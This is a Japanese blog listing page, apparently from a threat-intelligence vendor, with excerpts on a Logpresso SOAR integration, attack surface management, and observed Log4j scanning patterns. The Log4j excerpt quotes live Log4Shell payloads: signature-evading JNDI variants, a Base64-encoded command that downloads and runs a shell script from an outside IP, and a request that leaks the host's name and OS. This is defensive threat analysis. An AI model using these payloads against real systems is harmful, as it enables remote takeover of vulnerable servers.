攻撃対象領域管理 (ASM)、LogpressoのCriminal IP統合

SOAR(Security Orchestration, Automation and Response、ソア)フラットホームのLogpressoにCriminal IPが統合されました。Criminal IPで提供するAPIを通じてLogpressoのダッシュボードでCriminal IP攻撃対象領域管理を行うことができるようになり、 攻撃対象領域 にさらされたIT資産の自動モニタリングとVPN、Tor、Proxy IPの可否をご確認できます。 Criminal IP攻撃対象領域管理を支援するプラットホーム Logpresso Standard Logpresso Enterprise Logpresso Sonar Logpresso

By |2022-11-22T12:59:03+09:008月 25th, 2022|Tags: , , , |0 Comments

攻撃対象領域管理 : 未知の資産及び脆弱性の検知

企業と公共機関には数多くのネットワーク デバイスと DB、サーバー、アプリケーション、ドメインが存在します。このような全ての IT 資産は IP アドレスとポートで運営されています。ハッカーは開いているポートを探し、その中にも脆弱性があるサーバーを狙います。従って、ハッカーの狙いにならないように「 攻撃対象領域管理 (ASM)」はかけがえのないことです。過去にはデータセンターで全ての資産が集められていたが、現在の企業の資産はクラウド、支社または、子会社への分離、M&Aなどで分散されて複雑になりました。すなわち、攻撃者が侵入できる経路も多様になることを示します。  分散されて複雑になる企業の IT 資産の 攻撃対象領域 Criminal IP (https://www.criminalip.io/ja) はインターネットにつながれている全ての資産を含むインテリジェンスを提供します。CIP の会員に提供される

Criminal IPで分析したLog4jの攻撃パターン

Log4jの脆弱性が世界を襲った。ハッカーは、サーバーを丸ごと奪うためにLog4jの脆弱性に感染されたサーバーを見つけ、世界中のすべてのサーバーを毎日スキャンしています。ハッカーがlog4jの脆弱性を持っているサーバーを見つけるためにどのスキャン技術を使用しているかを調べました。 攻撃者は最も単純な方法で "${jndi:ldap://***.*.**.***:53/c}" パケットを送信し、サーバーの反応を調べます。しかし、このパターンはメディアなどにあまりにも多く公開されてきており、IDS・IPSで素早く検出されてブロックされています。したがって、下表のような変形した攻撃が使用されています。変更された攻撃パケットは、jndi:ldap のシグネチャを検出しないように j}ndi, {${::-j}${::-n}${::-d}${::-i}:${ ::-l}${::-d}${::-a}${::-p}, ${jndi:${lower:l}${lower:d}a${lower:p} などの形でペイロードを分割して送信する方法を使用します。   Log4jの一般的な攻撃パターン  ""t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')"" ""t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')"" 8080" "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F45.12.32.61%3A1389%2FOS%3D%24%7Bsys%3Aos.name%7D%2FHN%3D%24%7Benv%3AHOSTNAME%7D%2Ffeb12a13-5fe3-429a-bd12-ed0c72e2ad20%7D HTTP/1.1"" 403 152

Go to Top